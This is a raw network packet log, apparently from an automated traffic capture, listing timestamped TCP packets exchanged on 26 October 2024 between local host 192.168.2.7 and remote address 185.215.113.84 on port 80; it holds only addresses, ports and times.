Oct 26, 2024 07:27:22.282818079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.282847881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.282862902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.282879114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.282902002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.282912970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.282915115 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.282951117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.282985926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283004045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283020020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283025026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283040047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283040047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283060074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283061028 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283078909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283092022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283093929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283118963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283128977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283137083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283154011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283154964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283174038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283186913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283210039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283235073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283246040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283250093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283267975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283279896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283334970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283359051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283375978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283375978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283391953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283397913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283409119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283411980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283426046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283428907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283442020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283458948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283459902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283459902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283473969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283492088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283557892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283587933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283601999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283623934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283628941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283658981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283684969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283741951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283757925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283773899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283780098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283791065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283799887 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283807993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283807993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283823967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283826113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283839941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283843040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283857107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283876896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283911943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283948898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283962965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.283984900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.283993959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284009933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284009933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284032106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284033060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284049034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284049988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284069061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284073114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284081936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284085035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284099102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284102917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.284123898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.284137964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.324963093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.324982882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325006962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325031042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325046062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325047016 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.325061083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325078011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325088024 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.325092077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325105906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.325133085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.325957060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325973988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.325989008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.326004028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.326023102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.326055050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.339282036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339307070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339334011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339349031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339359999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.339365005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339380980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339396954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339402914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.339413881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.339421988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.339445114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.339463949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354321003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354347944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354363918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354378939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354394913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354396105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354412079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354429007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354434013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354437113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354450941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354464054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354473114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354480982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354506016 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354521036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354573011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354613066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354624987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354641914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354657888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354686975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354686975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354702950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354720116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354746103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354746103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354763985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354765892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354780912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354784012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354803085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354816914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354820967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354832888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354852915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354871035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354881048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354918003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354919910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.354933977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354948997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.354954004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355001926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355048895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355092049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355103016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355119944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355135918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355158091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355160952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355175972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355195999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355295897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355333090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355334997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355350018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355366945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355367899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355384111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355387926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355397940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355426073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355437994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355453014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355456114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355469942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355479956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355485916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355495930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355510950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355514050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355523109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355529070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355545044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355545998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355566978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355592012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355598927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355612993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355628967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355637074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355654955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355669022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355709076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355726004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355750084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355766058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355768919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355782986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355798006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355820894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355824947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355848074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355865002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355869055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355878115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.355884075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355909109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.355925083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359550953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359566927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359581947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359592915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359597921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359611034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359615088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359625101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359641075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359658957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359683037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359708071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359720945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359723091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.359745026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.359755039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.399980068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400151014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400165081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400178909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400194883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400209904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400227070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400242090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400259018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400298119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400314093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400360107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400360107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400360107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400469065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400485039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400500059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400500059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400516033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400537968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400638103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400654078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400667906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400682926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400690079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400716066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400808096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400824070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400840998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400844097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400868893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400868893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400886059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400888920 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400898933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400911093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400934935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.400953054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400959015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.400979042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401141882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401158094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401173115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401201963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401216984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401290894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401308060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401323080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401338100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401348114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401355028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401371956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401372910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401390076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401396036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401418924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401438951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401463032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401490927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401504993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401510000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401525974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401526928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401546955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401567936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401624918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401649952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401664972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401665926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401681900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401685953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401705980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401721001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401771069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401787043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401824951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.401952028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401967049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401983976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.401999950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402008057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402017117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402019978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402030945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402045965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402046919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402065992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402086020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402146101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402160883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402175903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402185917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402190924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402194977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402216911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402225018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.402230024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.402296066 CEST	80	49982	185.215.113.84	192.168.2.7
